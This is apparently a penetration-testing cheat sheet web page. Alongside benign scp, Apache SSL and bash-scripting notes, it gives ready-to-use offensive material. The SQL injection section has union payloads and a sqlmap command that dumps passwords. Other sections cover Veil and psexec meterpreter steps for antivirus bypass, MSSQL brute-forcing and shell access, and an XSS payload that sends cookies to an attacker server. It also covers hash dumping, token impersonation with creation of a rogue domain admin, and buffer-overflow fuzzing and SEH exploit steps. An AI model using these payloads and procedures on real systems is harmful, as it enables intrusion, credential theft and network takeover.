CheatSheet

SCP

Secure Copy (scp) Cheatsheet

• Copy remote file to local host
• Copy local file to remote host
• Copy local directory to remote directory
• Copy a file from one remote host to another
• Improve scp performance (use blowfish)

SQL Injection

Union Based SQL Injection

​' or 1=1#​1' 
ORDER BY 10#​1' UNION SELECT version(),2#​1' 
UNION SELECT version(),database()#​1' 
UNION SELECT version(),user()#​1' 
UNION ALL SELECT table_name,2 from information_schema.tables#​1' 
UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#​1' UNION ALL SELECT concat(user,char(58),password),2 from users

​​sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.
2. In msfconsole setup psexec with relevant payload

(windows/meterpreter/reverse_tcp)

then follow this steps:

​msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip RHOST => ip
msf exploit(psexec) > set SMBUser userSMBUser => user
msf exploit(psexec) > set SMBPass passSMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exeEXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

1. Enabling Self signed certificates on local website1.
2. Install OpenSSL​sudo apt-get install openssl​2.
3. Run the following command to generate the self signed SSL certificates:

​sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key​3. 

4. Enable SSL for Apache​sudo a2enmod ssl​4.
5. Put the default-ssl site available creating a symbolic link:

​sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf​5

6. Edit the file default-ssl.conf

​sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf​Change

the following lines to point to the

certs:​SSLCertificateFile /etc/ssl/certs/server.crtSSLCertificateKeyFile /etc/ssl/private/server.key​6

7. Restart Apache

​sudo /etc/init.d/apache2 restart

More Information

• https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
• https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
• http://www.akadia.com/services/ssh_test_certificate.html
• https://www.sslshopper.com/apache-server-ssl-installation-instructions.html

Attacking MS-SQL

Attacking MSSQL with Metasploit

• Enumerate MSSQL Servers on the network:

  ​msf > use auxiliary/scanner/mssql/mssql_pingnmap -sU --script=ms-sql-info ip ip
  

• Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
• Bruteforce MSSQL Database:

  ​msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  

• Enumerate MSSQL Database:

  ​msf > use auxiliary/admin/mssql/mssql_enum
  

• Gain shell using gathered credentials:

  ​msf > use exploit/windows/mssql/mssql_payload
  msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp​
  

Bash Scripting

Simple Bash Scripting Cheatsheet

• ctrl + y: Navigate to the previous page in nano.
• ctrl + w: Find/search for a specific term in nano.
• ctrl + k: Cut the current line of text in nano.
• ctrl + x: Exit the nano editor.
• touch file: create a new text file named "file".
• file.ifconfig > tmp: create an empty file named "file.ifconfig" and redirect its output to "tmp".
• nano file: open the nano editor with the file named "file".
• ifconfig > tmp: execute the ifconfig command and save its output to the file "tmp".
• echo >> tmp; ping google.com -c3 >> tmp: append the output of the "ping" command to the file "tmp".
• cat file: display the contents of the file "file".
• more file: display the contents of the file "file" one page at a time.
• head file: display the first 10 lines of the file "file".
• head -15 file: display the first 15 lines of the file "file".
• tail file: display the last 10 lines of the file "file".
• tail -15 file: display the last 15 lines of the file "file".
• tail -f file: continuously display the output of the file "file" (useful for log files).
• cat tmp | grep Bcast: pipe the output of "cat tmp" to the grep command, searching for "Bcast".
• ps aux: display all running processes for all users.
• kill -9 PID: forcefully terminate the process with the specified PID.
• wc -l tmp2: count the number of lines in the file "tmp2".
• cut -d delimiter -f fields: cut fields from lines of a file based on a delimiter.
• sort -u file: sort the contents of the file "file" and remove duplicates.
• sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n: sort IP addresses correctly.
• awk '{print $1}' file: display the first column of the file "file".
• awk '{print $1,$5}' file: display the first and fifth columns of the file "file".
• grep -v 'string' file: display lines from the file "file" that do not contain the specified string.
• egrep -v '(string1|string2|string3)' file: display lines from the file "file" that do not contain multiple specified strings.
• sed 's/FOO/BAR/g' file: replace all occurrences of "FOO" with "BAR" in the file "file".
• sed 's/FOO//g' file: remove all occurrences of "FOO" from the file "file".
• sed '/^FOO/d' file: remove lines from the file "file" that start with "FOO".
• Set text color: echo -e "\e[1;34m This is a blue text.\e[0m"

​Bash Scripts

• Simple bash script

#!/bin/bash
echo "Hello world." 

• Make a file executable

chmod +x file
or
chmod 755 file 

• Variables

name=Bobecho 
$nameuser=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

• IP Address

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip

• User Input

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

• Check For No User Input

#!/bin/bash
if [ -z $domain ]; then
echo "#########################"
echo "Invalid choice."
exit
fi 

• For loops

#!/bin/bash
for host in $(cat hosts.txt)
do
command $host
done

• One Liners​Port Scan

 for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done  

CTF Notes

• Enumerate Users via Finger
• Show nfs shares availableshowmount -e ip
• User nfspysh to mount share and create .ssh directorynfspysh -o server=ip:/home/usermkdir .sshcd .ssh
• Generate ssh key pair

  ssh-keygencp id_rsa.pub /tmp/authorized_keys
  

• Transfer attacker public key to host

  put /tmp/authorized_keysexit
  

• Login to SSH server with no password​​

Cookie Stealing

​ - Start Web Service

​python -m SimpleHTTPServer 80​

- Use one of the following XSS payloads:​

<script>
    document.write('<img src="http://your_server.com/steal_cookie.php?cookie=' + document.cookie + '">');
</script>

Domain Admin Exploitation

After compromising a Windows machine:

• List the domain administrators:

  From Shell - net group "Domain Admins" /domain
  

• Dump the hashes (Metasploit)

  msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
  

• Find the admins (Metasploit)

  spool /tmp/enumdomainusers.txt
  msf > use auxiliary/scanner/smb/smb_enumusers_domain
  msf > set smbuser Administrator
  msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
  msf > set rhosts ip/24
  msf > set threads 8
  msf > run
  ​msf> spool off
  

Compromise Admin's box

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministratormeterpreter > getuid
meterpreter > shell
​C:\> whoamimydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit Development Cheatsheet

​Fuzzing

​import socket
​buffer = ["A"]
counter = 50​
while len(buffer) <= 1000:    
    buffer.append("A" * counter)    
    counter = counter + 50 ​
for buffstring in buffer:    
    print "Fuzzing:" + str(len(buffstring))    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
    sock.connect( ("192.168.0.20", 5555) )    
    sock.send(buffstring)    
    sock.close()

Bad Character

Testing:​"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e""\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d""\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c""\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b""\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a""\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59""\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68""\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77""\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86""\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95""\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4""\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3""\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2""\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1""\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0""\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef""\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe""\xff"​

Structured Exception Handler (SEH) Exploitation notes

• Crash the application.
• Check SEH overwirte (view-seh chain).
• Find offset (!mona pattern_create ).
• Find certain SEH references to the cyclic pattern (!mona findmsp)- Verify offset to NSEH (Next Exception).
• Find POP/POP/RET address with mona (!mona seh -cpb ).
• Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding).
• Add shellcode to the payload.
• Ensure existing padding to make sure the crash still happens.

​